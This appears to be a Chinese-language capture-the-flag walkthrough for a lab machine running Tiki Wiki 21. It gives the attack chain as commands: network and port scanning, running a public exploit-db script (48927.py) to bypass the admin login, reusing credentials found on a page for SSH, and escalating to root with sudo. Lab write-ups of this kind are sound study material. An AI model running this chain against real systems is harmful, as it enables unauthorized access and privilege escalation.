一、主机IP探测
arp-scan -l
靶机IP:192.168.1.106
二、端口扫描
nmap -T4 -sV -p- -A 192.168.1.106
开放了22、80、139和445四个端口。
三、端口分析
22端口下有一个robots协议,查看一下。
看看tiki。
是一个tiki的cms。
四、版本确认
cms一般有可用的payload,找一下tiki的版本。
直接访问tiki目录下的changelog.txt文件,可以看到版本是21。
五、寻找payload
searchsploit Tiki Wiki 21
利用exp
python3 /usr/share/exploitdb/exploits/php/webapps/48927.py 192.168.1.106
它这个提示的意思是用burpsuite登录admin账户,不填密码直接登录。
登录成功。
每一个页面都点一点,发现了一个像密码的东西 Credentials
六、ssh登录
用上面credentials里的账户密码登录ssh。
ssh silky@192.168.1.106
登录成功。
sudo -i
用刚才credentials里的密码提权,成功